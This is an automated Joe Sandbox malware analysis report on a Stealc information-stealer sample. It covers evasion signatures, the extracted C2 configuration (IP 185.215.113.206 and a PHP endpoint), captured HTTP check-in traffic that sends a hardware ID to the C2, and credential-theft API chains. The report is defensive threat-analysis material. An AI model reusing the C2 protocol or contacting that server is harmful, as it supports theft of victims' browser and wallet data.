Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561557
MD5:2ddf913f1bfac8e658b52ccbd75e8c80
SHA1:f1d0732f7ba49cd0dfee3ea084020e5b75c7ed22
SHA256:8de92a481031783cdc05d07776627e2294dcb823399b3887e60ce461ff1ecad7
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2DDF913F1BFAC8E658B52CCBD75E8C80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1683174782.0000000004E40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6640JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6640JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T19:01:04.913259+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/uPAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/PAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.6640.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F64C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00F64C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F660D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00F660D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F840B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00F840B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F76960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00F76960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_00F6EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F69B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00F69B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F76B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00F76B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F69B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00F69B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F67750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00F67750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F718A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00F718A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F73910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F73910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F71269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F71269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F71250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F71250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00F7E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00F7CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F723A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00F723A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F72390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00F72390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F6DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F6DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F74B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00F74B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F74B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F74B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F7D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00F7DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F616B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00F616B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F616A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00F616A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 38 32 43 31 33 37 44 44 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="hwid"1882C137DD0C3886582548------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="build"mars------IIEHJKJJJECFHJJJKKEC--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F64C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00F64C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 38 32 43 31 33 37 44 44 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="hwid"1882C137DD0C3886582548------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="build"mars------IIEHJKJJJECFHJJJKKEC--
              Source: file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/:
              Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/P
              Source: file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
              Source: file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpj
              Source: file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr
              Source: file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/uP
              Source: file.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F69770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00F69770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F848B00_2_00F848B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0131704E0_2_0131704E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01313B2A0_2_01313B2A
